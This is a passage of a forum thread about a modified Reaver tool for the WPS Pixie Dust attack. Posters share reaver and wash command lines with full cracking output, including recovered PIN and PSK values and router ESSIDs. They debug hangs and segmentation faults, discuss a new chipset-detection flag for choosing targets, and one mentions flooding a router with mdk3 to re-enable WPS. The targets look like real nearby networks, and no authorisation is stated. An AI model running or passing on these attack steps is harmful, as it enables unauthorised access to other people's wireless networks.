Page 2 of 11 FirstFirst 1234 ... LastLast
Results 11 to 20 of 107

Thread: Reaver modfication for Pixie Dust Attack

  1. #11
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    No segmentation fault for me, however

    If no pin found ok, then exit
    Code:
    root@kali:~# reaver -i wlan3mon -b C4:.............. -vv -a -K3 -P
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead
    
    [+] p1_index set to 1
    [+] p2_index set to 0
    [+] Restored previous session
    [+] Waiting for beacon from C4:..............
    [+] Switching wlan3mon to channel 1
    [+] Switching wlan3mon to channel 2
    [+] Switching wlan3mon to channel 3
    [+] Switching wlan3mon to channel 4
    [+] Switching wlan3mon to channel 5
    [+] Switching wlan3mon to channel 6
    [+] Associated with C4:.............. (ESSID: TP-*********)
    [+] Starting Cracking Session. Pin count: 1, Max pin attempts: 11000
    [+] Trying pin 00005678.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: dc:71:07:21:ab:fd:d2:8e:9a:63:b0:1c:e3:43:2f:6e
    [P] PKE: 7b:4b:4f:84:3c:94:ef:c9:64:39:c8:f6:43:3d:ce:24:8f:c7:5a:f1:c8:49:e4:b0:29:35:e0:d4:e9:10:ee:a4:85:c6:07:50:98:cf:49:18:a7:31:c3:85:2a:cd:ec:82:57:fd:f6:60:8c:78:18:2b:d4:39:95:04:d8:73:ac:43:60:d9:4d:06:ae:b9:0f:62:47:a6:f9:70:80:79:7d:45:3f:0a:00:fb:d0:44:f2:f7:5b:62:12:5d:7f:ce:4d:e4:5c:d3:47:10:9a:f7:5c:8b:46:a7:93:dc:04:4f:15:7e:e4:3a:77:20:b4:a4:45:a4:6b:9b:a5:61:c0:e9:c3:55:bc:e3:39:8e:82:df:24:1f:15:e7:f1:a9:86:6e:b7:7a:35:a5:26:5a:28:ef:0e:94:39:2c:18:ce:ca:3d:93:a5:b3:a5:80:f3:e7:33:13:ec:88:9c:60:69:b7:04:14:ca:d2:07:b1:7c:cf:67:43:72:0a:66:65:29:90:bf:59:94
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 1.0
    [+] Received M1 message
    [P] PKR: b9:de:9f:be:19:9a:92:78:4b:fc:b1:0f:dc:0d:5b:db:e6:b2:85:c6:96:1d:f1:93:66:59:06:53:7d:62:01:7d:bf:96:3c:8e:ed:c8:e6:08:f1:4a:48:c2:a5:f6:08:51:8e:1b:01:38:69:b0:d4:cd:d9:ef:1d:f0:4e:82:46:b3:cf:19:aa:1c:2e:e5:dc:4e:10:7c:71:c3:69:77:32:fe:2f:27:dc:d9:0e:20:2f:64:55:2d:58:d0:79:ee:dd:7d:70:04:13:62:3f:c3:39:c0:32:f5:83:3c:80:ba:b6:b6:37:9b:89:12:05:65:52:65:ac:e4:1f:fb:2c:31:aa:da:d4:f3:36:b1:04:2e:e0:a8:bd:4d:68:ca:13:98:2b:32:eb:81:ee:7c:e8:8d:ae:95:6e:06:08:4c:b2:f6:cc:26:c7:7a:7b:e3:03:f5:17:30:8a:c7:22:93:5c:79:d9:11:d0:73:8c:37:44:72:33:70:49:c6:ba:3d:0c:50:56:42
    [P] AuthKey: c9:6a:f4:8d:ea:95:40:09:31:59:15:ee:fd:8c:f4:84:2b:e7:6c:b1:89:8f:80:c8:a4:85:71:d4:57:e8:b5:75
    [+] Sending M2 message
    [P] E-Hash1: 32:2d:a3:b9:96:e3:a6:5e:92:ad:93:33:9a:08:00:d9:be:87:b8:a1:ee:9d:70:6f:c3:5d:2e:91:63:ab:d6:dc
    [P] E-Hash2: 55:95:0f:16:3c:33:bb:c8:31:2f:ff:f6:c3:45:09:ee:e3:ba:f9:d6:f9:15:c0:36:69:3b:1c:e2:9d:f8:cd:25
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]
    But if pin found, hangs
    Code:
    root@kali:~# reaver -i wlan3mon -b 8C:.......... -vv -a -K3 -P
    
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    mod by DataHead
    
    [+] Waiting for beacon from 8C:..........
    [+] Switching wlan3mon to channel 1
    [+] Switching wlan3mon to channel 2
    [+] Switching wlan3mon to channel 3
    [+] Switching wlan3mon to channel 4
    [+] Switching wlan3mon to channel 5
    [+] Switching wlan3mon to channel 6
    [+] Switching wlan3mon to channel 7
    [+] Switching wlan3mon to channel 9
    [+] Associated with 8C:.......... (ESSID: TG167*****)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 2c:62:2f:3c:6f:e9:d4:75:92:a3:d3:e4:59:a0:92:bc
    [P] PKE: db:4c:8c:5d:1c:61:a0:b5:dd:4c:4b:6a:0a:59:02:c2:46:af:29:53:d4:14:77:9e:b4:0f:48:bc:95:40:6e:ed:e4:9a:08:46:29:78:a4:fe:6a:e2:45:65:73:cf:01:b1:4c:34:60:fa:87:30:7b:d2:6a:7a:fc:7d:7d:2f:8e:55:ab:43:e7:e9:87:31:2a:dc:08:e6:3e:2b:d3:80:93:ab:5c:c4:c5:93:07:6d:19:85:f1:39:56:55:6b:93:bb:ce:09:72:e6:b5:76:00:bb:ea:f7:04:ad:2d:71:83:2a:21:a5:dd:68:1f:dc:a4:88:6b:8c:8a:4d:39:a0:53:a1:3c:2c:c5:15:4c:15:03:db:f7:01:e6:fd:22:05:17:0d:86:07:44:c7:18:8c:9d:b7:fc:13:8a:0c:01:7b:38:c8:ca:05:99:e3:1f:4a:07:10:9b:19:b5:03:02:56:32:30:1a:57:b5:db:92:48:c1:f3:3e:45:e8:60:c4:ef:2e:87:79
    [P] WPS Manufacturer: Celeno Communication, Inc.
    [P] WPS Model Number: CL1800
    [+] Received M1 message
    [P] PKR: 04:10:d7:4d:a0:29:b4:8e:00:85:85:47:cd:bc:5f:84:da:c0:c8:4a:f2:36:8c:56:5c:00:28:a8:90:31:14:11:0e:24:d8:e2:fe:8f:58:db:8c:f1:28:f9:e3:81:f7:93:2a:2e:10:3c:f5:ec:55:ba:95:a0:87:73:c6:83:00:f2:1f:e0:00:80:6c:c9:1f:5c:76:6f:27:df:c9:25:21:58:e5:24:c8:26:80:67:d4:18:ab:68:79:bd:06:ac:b9:0b:7d:75:68:52:99:0c:c3:1c:30:1c:80:a1:c1:49:5a:29:b6:ac:98:b5:b6:c3:c4:fe:67:80:02:ae:9f:f7:ef:34:41:02:39:e5:f6:6b:ec:73:19:b5:be:75:ed:ed:ac:d6:e4:0c:68:7a:b8:a7:a6:fe:98:9e:7f:00:3a:78:b3:69:df:9c:13:fc:8f:50:58:01:31:5a:1b:8c:81:5d:47:99:1b:d9:0a:8b:b0:49:6f:9b:1a:af:25:31:c5:10:13:8c
    [P] AuthKey: eb:35:cb:40:af:86:fd:1d:8d:bb:2e:8b:82:f8:02:e5:3d:19:3b:9d:6a:2d:52:d2:97:49:dd:97:48:e6:41:db
    [+] Sending M2 message
    [P] E-Hash1: b9:76:ae:bd:db:d4:18:bc:2d:31:2f:24:02:d5:c4:a6:82:15:2e:00:da:de:98:dd:4e:a9:bd:fc:ee:b4:bc:cd
    [P] E-Hash2: a3:9b:6a:34:d8:39:7f:9e:07:21:68:b3:67:ed:82:42:08:61:e4:25:96:6d:4d:93:d6:ba:1f:38:aa:3f:09:0f
    [Pixie-Dust]  
    [Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] PSK1: b5:33:92:d2:5f:d2:d3:4a:ae:cb:81:db:c9:f6:63:a6
    [Pixie-Dust]   [*] PSK2: bb:f8:7f:74:54:1c:8b:74:e8:2a:3f:d3:c2:57:4e:36
    [Pixie-Dust]   [+] WPS pin: 50..........
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]  
    Running the reaver with the correct pin, wait ...
    Cmd : reaver -i wlan3mon -b 8C:09:F4:.......:00 -c 9 -s y -p 50..........
    
    [Reaver Test] BSSID: 8C:09:00:11:00:11
    [Reaver Test] Channel: 9
    hangs there

  2. #12
    Member
    Join Date
    Apr 2015
    Posts
    39
    nuroo

    try with a fixed channel, the reaver is trying to get the psk, but if the reaver not able to complete the task he is in this loop until get, if the router is far away the reaver it difficult to get up to the final stage

    better I put a timeout, tomorrow will make the bug fix


    And sorry for the credits hahaha

    It would be a good he already try all the Ks, I'll think of something.

    thank you again
    Last edited by t6_x; 2015-04-15 at 09:05 AM.

  3. #13
    Member
    Join Date
    Apr 2015
    Posts
    39
    Option -g released in the wash

    Code:
    -g, --get-chipset                    Output Piped and tries to read the chipset with reaver
    Example

    Code:
    # wash -i mon0 -g -c 2
    XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
    XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U

  4. #14
    Junior Member
    Join Date
    Nov 2014
    Posts
    7
    Quote Originally Posted by soxrok2212 View Post
    Another idea... have all the extra stuff print only with verbosity mode selected
    -v -vv -vvv maby?

    Quote Originally Posted by soxrok2212 View Post
    Update: I'm getting a segmentation fault when I use -K 1 and -K 3

    Code:
    Segmentation fault
    I also receive segmentation fault error too...

  5. #15
    Member
    Join Date
    Apr 2015
    Posts
    39
    Quote Originally Posted by SubZero5 View Post
    -v -vv -vvv maby?


    I also receive segmentation fault error too...
    any router? or some router in specific?

  6. #16
    Senior Member
    Join Date
    Aug 2013
    Location
    lost in space
    Posts
    580
    Thx t6x!

    Quote Originally Posted by SubZero5 View Post
    -v -vv -vvv maby?
    yesss. That. Keep different functions/improvement separated.
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  7. #17
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    In my orginal reaver command, I did not specify a channel on purpose, to troubleshoot. But your code for reaver part2 - passphrase puts -channel automatic -NICE!
    [Pixie-Dust][*] PSK2: bb:f8:7f:74:54:1c:8b:74:e8:2a:3f:d3:c2:57:4e:36
    [Pixie-Dust] [+] WPS pin: 50..........
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    Running the reaver with the correct pin, wait ...
    Cmd : reaver -i wlan3mon -b 8C:09:F4:.......:00 -c 9 -s y -p 50..........

    [Reaver Test] BSSID: 8C:09:00:11:00:11
    [Reaver Test] Channel: 9

    I guess the AP just so to far away like u said.

    The -g option in wash for chipset excellent idea. Better to pick targets. Can't wait to try it later.
    Last edited by nuroo; 2015-04-15 at 09:35 PM.

  8. #18
    Junior Member
    Join Date
    Apr 2015
    Posts
    9
    is this version of reaver compatible with wps version 00? because i tryed this on TP-LINK TD-W8961ND and it always get stock in M2 after getting PKr and wps get disabled i have to DDos the router with Mdk3 to activate wps again ScreenShot_20150414174436.jpg

  9. #19
    Junior Member
    Join Date
    Apr 2015
    Posts
    9
    it's wierd i got the same Pkr when i tryed Reaver on TP-LINK TD-W8961ND the only problem is Reaver always get stock at M2 so i didnt AuthKe,E-Hash1 and E-Hash2

  10. #20
    Senior Member
    Join Date
    Mar 2015
    Posts
    127
    I love the -g option. Just tried it. This is a great idea.

    Your right it does need a timer and or -rssi strength filter.

    Or maybe each access point is independent process so wash can move on to next AP, maybe display something like waiting...... until response recieved. (but i'm not coder, maybe to much work)

    00:00:00:00:B6:A0| 6|-48|1.0|No |We hear you walking upstairs| Cisco| 123456
    00:00:00:00:AD:00| 6|-47|1.0|No |TommyAndy4E| Waiting for Response..........
    00:00:00:00:37:56| 6|-56|1.0|No |100 Kane| Belkin International Inc.| RE6500
    00:00:00:00:8F:80| 6|-63|1.0|No |DG1670A82| Celeno Communication, Inc.| CL1800
    00:00:00:00:62:6C| 6|-50|1.0|No |Kirinyaga| NETGEAR, Inc.| Waiting for Response..........


    Also
    -P option on purpose have no header, so it can be small in terminal window?
    Code:
    BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
    -------------------------------------------------------------------------------------------

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •